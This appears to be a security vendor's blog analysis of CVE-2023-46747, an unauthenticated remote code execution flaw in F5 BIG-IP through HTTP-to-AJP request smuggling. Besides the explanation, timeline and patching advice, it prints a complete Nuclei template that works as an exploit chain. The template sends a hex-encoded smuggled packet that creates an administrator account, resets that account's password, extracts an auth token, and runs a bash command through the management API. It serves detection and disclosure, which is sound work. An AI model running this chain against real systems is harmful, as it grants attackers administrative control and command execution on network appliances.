4 min read
F5 BIG-IP Unauth RCE via AJP Smuggling (CVE-2023-46747) - Technical Analysis
Table of Contents
Description:
CVE-2023-46747 is a critical vulnerability in the F5 BIG-IP Configuration Utility identified as a request smuggling bug within the Apache JServ Protocol (AJP). The flaw could potentially allow unauthenticated attackers with network access to the BIG-IP system through the management port and/or self-IP addresses to execute arbitrary system commands. This vulnerability was discovered and reported by Thomas Hendrickson and Michael Weber of Praetorian Security. It has a CVSS score of 9.8: critical severity.
Technical Details:
The attack primarily exploits the HTTP to AJP request smuggling due to inconsistencies in handling Content-Length/Transfer-Encoding headers between Apache HTTPd and AJP Processing in Tomcat. Here's a breakdown:
1. Origin of the Discrepancy: Apache HTTPd receives an HTTP request with a Transfer-Encoding: chunked, chunked
header, which it then sends to Tomcat via AJP. Tomcat, expecting Transfer-Encoding
to be just chunked
, doesn't find a match. It then looks for a Content-length
header, which isn't there, so it defaults to assuming a Content-length of 0.
2. Resulting Desynchronization: This misunderstanding means the AJP Data packet (essentially the POST Body of the HTTP request) is misinterpreted as a separate AJP Forward Request packet.
3. Exploiting the Gap: Attackers, by crafting the POST body to precisely 516 bytes (0x204 bytes), can evade the initial authentication checks and access specific /tmui/ endpoints directed to the AJP port.
4. Bypassing Further Checks: There are additional authentication steps on many /tmui/* pages. Overcoming these requires:
- Setting the REMOTE_USER
attribute which can be done at the AJP level.
- Providing a REMOTEROLE
request header with any valid integer role id, ensuring successful authentication bypass.
5. Gaining Full Access: The goal is to find requests under 516 bytes that grant admin user access or allow remote code execution. One such request was discovered that creates an admin user through the BIG-IP UI, specifically targeting the /tmui/Control/form endpoint. Though initially oversized, the request was slimmed down by removing redundant parameters to fit within the 516-byte limit.
6. Overcoming Final Hurdles: A CSRF check exist in the user creation action that ensures if the _bufvalue
parameter matches the base64 SHA1 digest of the Tmui-Dubbuf
header and the _timenow
parameter concatenated together. Given the full control of the request we could calculate these values ahead of time. Also, to meet the requirement of exact 0x204 bytes of packet size, padding with extra "B"s in the Tmui-Dubbuf
header was added.
7. Endgame: TL;DR: attackers can establish an admin user without prior authentication. Once this is done, they can use built-in F5 functionalities to run Bash commands, allowing them to execute code.
Nuclei Template
The ProjectDiscovery research team compiled a template so that all nuclei users can detect exploitable vulnerabilities to CVE-2023-46747 in their attack surface. This was developed within 5 days of the CVE notification, and just 24 hours after the public disclosure of the details of the vulnerability.
yaml
1id: CVE-2023-46747
2
3info:
4 name: F5 BIG-IP - Unauthenticated RCE via AJP Smuggling
5 author: iamnoooob,rootxharsh,pdresearch
6 severity: critical
7 description: |
8 CVE-2023-46747 is a critical severity authentication bypass vulnerability in F5 BIG-IP that could allow an unauthenticated attacker to achieve remote code execution (RCE). The vulnerability impacts the BIG-IP Configuration utility, also known as the TMUI, wherein arbitrary requests can bypass authentication. The vulnerability received a CVSSv3 score of 9.8.
9 reference:
10 - https://www.praetorian.com/blog/refresh-compromising-f5-big-ip-with-request-smuggling-cve-2023-46747/
11 - https://my.f5.com/manage/s/article/K000137353
12 tags: cve,cve2023,rce,f5,bigip,unauth,ajp,smuggling,intrusive
13
14variables:
15 username: "{{hex_encode(rand_base(5))}}"
16 password: "{{hex_encode(rand_base(12))}}"
17 password2: "{{rand_base(14)}}"
18
19http:
20 - raw:
21 - |+
22 POST /tmui/login.jsp HTTP/1.1
23 Host: {{Hostname}}
24 Transfer-Encoding: chunked, chunked
25 Content-Type: application/x-www-form-urlencoded
26
27 204
28 {{ hex_decode(concat("0008485454502f312e310000122f746d75692f436f6e74726f6c2f666f726d0000093132372e302e302e310000096c6f63616c686f73740000096c6f63616c686f7374000050000003000b546d75692d44756262756600000b424242424242424242424200000a52454d4f5445524f4c450000013000a00b00096c6f63616c686f73740003000561646d696e000501715f74696d656e6f773d61265f74696d656e6f775f6265666f72653d2668616e646c65723d253266746d756925326673797374656d25326675736572253266637265617465262626666f726d5f706167653d253266746d756925326673797374656d253266757365722532666372656174652e6a737025336626666f726d5f706167655f6265666f72653d26686964654f626a4c6973743d265f62756676616c75653d65494c3452556e537758596f5055494f47634f4678326f30305863253364265f62756676616c75655f6265666f72653d2673797374656d757365722d68696464656e3d5b5b2241646d696e6973747261746f72222c225b416c6c5d225d5d2673797374656d757365722d68696464656e5f6265666f72653d266e616d653d",username,"266e616d655f6265666f72653d267061737377643d",password,"267061737377645f6265666f72653d2666696e69736865643d782666696e69736865645f6265666f72653d00ff00")) }}
29 0
30
31 unsafe: true
32
33 - raw:
34 - |+
35 PATCH /mgmt/tm/auth/user/{{hex_decode(username)}} HTTP/1.1
36 Host: {{Hostname}}
37 Authorization: Basic {{base64(hex_decode(username)+":"+hex_decode(password))}}
38 Content-Type: application/json
39
40 {"password": "{{password2}}"}
41
42 - |+
43 POST /mgmt/shared/authn/login HTTP/1.1
44 Host: {{Hostname}}
45 Content-Type: application/json
46
47 {"username":"{{hex_decode(username)}}", "password":"{{pass}}"}
48
49 - |+
50 POST /mgmt/tm/util/bash HTTP/1.1
51 Host: {{Hostname}}
52 X-F5-Auth-Token: {{token}}
53 Content-Type: application/json
54
55 {"command":"run","utilCmdArgs":"-c id"}
56
57 payloads:
58 pass:
59 - '{{password2}}'
60 - '{{hex_decode(password)}}'
61 skip-variables-check: true
62 stop-at-first-match: true
63
64 extractors:
65 - type: regex
66 part: body_2
67 name: token
68 group: 1
69 regex:
70 - "([A-Z0-9]{26})"
71 internal: true
72
73 - type: regex
74 part: body_3
75 group: 1
76 regex:
77 - "\"commandResult\":\"(.*)\""
78
79 - type: dsl
80 dsl:
81 - '"Username:" + hex_decode(username)'
82 - '"Password:" + pass'
83 - '"Token:" + token'
84 matchers:
85 - type: word
86 words:
87 - "commandResult"
88 - "uid="
89 condition: and
Timeline:
- October 26, 2023: Initial advisory and limited details for CVE-2023-46747 were published.
- October 30, 2023: The Nuclei Template was released by the ProjectDiscovery Research Team.
- October 31, 2023: Full disclosure of the vulnerability was publicly shared by Praetorian
Remediation:
Patching is the strongly recommended course of action to remediate this vulnerability. F5 has provided mitigation guidance alongside patching, especially if patching cannot be performed immediately. It is advisable to review the F5 article here for recommended mitigation steps and warnings. Additionally, F5 has cautioned that the provided mitigation script must NOT be used on BIG-IP versions prior to 14.1.0.
References:
- Help Net Security Article: F5 fixes critical BIG-IP vulnerability, PoC is public (CVE-2023-46747)
- Tenable Blog Post: CVE-2023-46747: Critical Authentication Bypass Vulnerability
- NVD Entry: CVE-2023-46747
- F5 Security Advisory: K000137353: BIG-IP Configuration utility unauthenticated remote code execution vulnerability CVE-2023-46747
- Praetorian Blog Post: The Discovery of F5 BIG-IP Vulnerability CVE-2023-46747